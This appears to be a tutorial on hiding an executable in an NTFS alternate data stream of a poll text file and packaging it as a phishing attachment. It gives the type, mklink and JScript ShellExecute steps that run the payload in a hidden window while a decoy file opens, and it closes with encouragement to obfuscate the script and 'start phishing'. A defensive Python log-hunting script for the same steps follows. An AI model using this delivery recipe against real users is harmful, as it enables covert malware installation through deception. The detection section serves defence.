In our scenario, we assume that we are sending four files (two of them preferably hidden) inside a zipped directory as part of a poll survey:
1) The first file is Poll.txt, which matches the subject of our phishing lure. It contains some multiple-choice questions.
Here our purpose is to embed malware.exe (calc.exe in this example) into Poll.txt. The following command writes the exe into an Alternate Data Stream (ADS) of the text file:
type calc.exe > Poll.txt:calc.exe
Now Poll.txt has another exe file embedded inside it. You can verify this with the "dir /r" command.
2) It is no longer possible to run an embedded file directly from the ADS of a file, but there is a workaround. First, we create a symbolic link to the embedded stream:
mklink config.txt Poll.txt:calc.exe
Now, if you type 'config.txt' at the command prompt, calc.exe pops up (double-clicking the file does not have the same effect). You can make the file hidden through its property options.
3) Create another text file, README.txt, and put some text into it. You can make that file hidden as well.
4) The fourth file is a script with the following JScript content:
var objShell = new ActiveXObject("shell.application");
// Run the symlink through cmd.exe in a hidden window (show flag 0); this starts calc.exe from the stream
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
// Open the decoy README.txt in a visible window (show flag 1) so the recipient sees what they expect
objShell.ShellExecute("README.txt", "", "", "open", 1);
You can obfuscate this code, of course; I leave it to you.
We are done. Now you can zip this directory and start phishing 🙂
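From the defender's side, the steps above leave distinctive traces in process-creation telemetry. The following Python script is an added example and is not part of the original post: it scans constructed Sysmon-style process-creation records (parent image, image, command line) and flags a redirect that writes into an alternate data stream, an mklink whose target is a stream, and a script host launching cmd.exe against a file with a non-executable extension. The pipe-delimited log format, the field layout, the rule names and the sample lines are all assumptions made for this example.

```python
"""Hunt for the ADS-staging pattern in process-creation telemetry.

Added example (not from the original post). Records are assumed to be
pipe-delimited Sysmon-style process-creation events:
    timestamp|ParentImage|Image|CommandLine
The log lines in SAMPLE_LOG are constructed for the example.
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
NON_EXEC_EXT = {".txt", ".log", ".csv", ".dat"}
# The token following ">" or ">>" (quoted or bare) is the redirect target.
REDIRECT_RE = re.compile(r'>{1,2}\s*("[^"]+"|\S+)')

# Constructed sample log: lines 1-3 mirror the post's steps,
# lines 4-5 are benign look-alikes that must not alert.
SAMPLE_LOG = [
    r"2024-01-01T10:00:00|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c type calc.exe > Poll.txt:calc.exe",
    r"2024-01-01T10:00:05|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c mklink config.txt Poll.txt:calc.exe",
    r'2024-01-01T10:01:00|C:\Windows\System32\wscript.exe|C:\Windows\System32\cmd.exe|"C:\Windows\System32\cmd.exe" /c config.txt',
    r"2024-01-01T10:02:00|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c type notes.txt > C:\backup\notes.txt",
    r"2024-01-01T10:03:00|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c mklink /D docs C:\Users\alice\Documents",
]


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def ads_target(token):
    """Return (file, stream) if token names an NTFS alternate data stream.

    A leading drive-letter colon ("C:\\...") is part of the path, not a
    stream separator, so it is stripped first; a trailing ":$DATA" stream
    type is ignored; a stream name containing a path separator is rejected.
    """
    tok = token.strip('"')
    body = tok[2:] if re.match(r"^[A-Za-z]:", tok) else tok
    name, sep, stream = body.partition(":")
    if not sep:
        return None
    stream = re.sub(r":\$DATA$", "", stream, flags=re.IGNORECASE)
    if not name or not stream or "\\" in stream or "/" in stream:
        return None
    return name, stream


def check_ads_write(cmdline):
    """Step 1 of the post: a shell redirect whose target is a stream."""
    for m in REDIRECT_RE.finditer(cmdline):
        hit = ads_target(m.group(1))
        if hit:
            return f"redirect writes stream '{hit[1]}' into {hit[0]}"
    return None


def check_ads_link(cmdline):
    """Step 2 of the post: mklink whose link target is a stream."""
    toks = split_cmdline(cmdline)
    low = [t.lower() for t in toks]
    if "mklink" not in low:
        return None
    # Drop switches such as /D or /H; what remains is <link> <target>.
    args = [t for t in toks[low.index("mklink") + 1:] if not t.startswith("/")]
    if len(args) >= 2:
        hit = ads_target(args[1])
        if hit:
            return f"symlink {args[0]} -> stream '{hit[1]}' of {hit[0]}"
    return None


def check_script_host_cmd(parent, image, cmdline):
    """Step 4 of the post: a script host runs cmd.exe on a non-executable name."""
    if ntpath.basename(parent).lower() not in SCRIPT_HOSTS:
        return None
    if ntpath.basename(image).lower() != "cmd.exe":
        return None
    toks = split_cmdline(cmdline)
    low = [t.lower() for t in toks]
    for flag in ("/c", "/k"):
        if flag in low and low.index(flag) + 1 < len(toks):
            target = toks[low.index(flag) + 1]
            if ntpath.splitext(target)[1].lower() in NON_EXEC_EXT:
                return f"{ntpath.basename(parent)} ran cmd.exe {flag} on non-executable {target}"
    return None


def analyze(lines):
    """Return (line_no, rule, detail) for every record that trips a rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        _ts, parent, image, cmdline = line.split("|", 3)
        for rule, detail in (
            ("ADS_WRITE", check_ads_write(cmdline)),
            ("ADS_SYMLINK", check_ads_link(cmdline)),
            ("SCRIPT_HOST_CMD", check_script_host_cmd(parent, image, cmdline)),
        ):
            if detail:
                findings.append((n, rule, detail))
    return findings


if __name__ == "__main__":
    for n, rule, detail in analyze(SAMPLE_LOG):
        print(f"line {n}: {rule}: {detail}")
```

A redirect typed interactively in cmd.exe is performed by that shell itself and produces no child process-creation record, so the ADS_WRITE rule mainly catches scripted or `cmd /c` usage; to find streams already on disk, enumerate them on the host with `dir /r` as the post shows, or with PowerShell's `Get-Item -Stream *`.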
(Please use such techniques only for ethical pen testing purposes; it is illegal to use them otherwise, and don't be a fool.)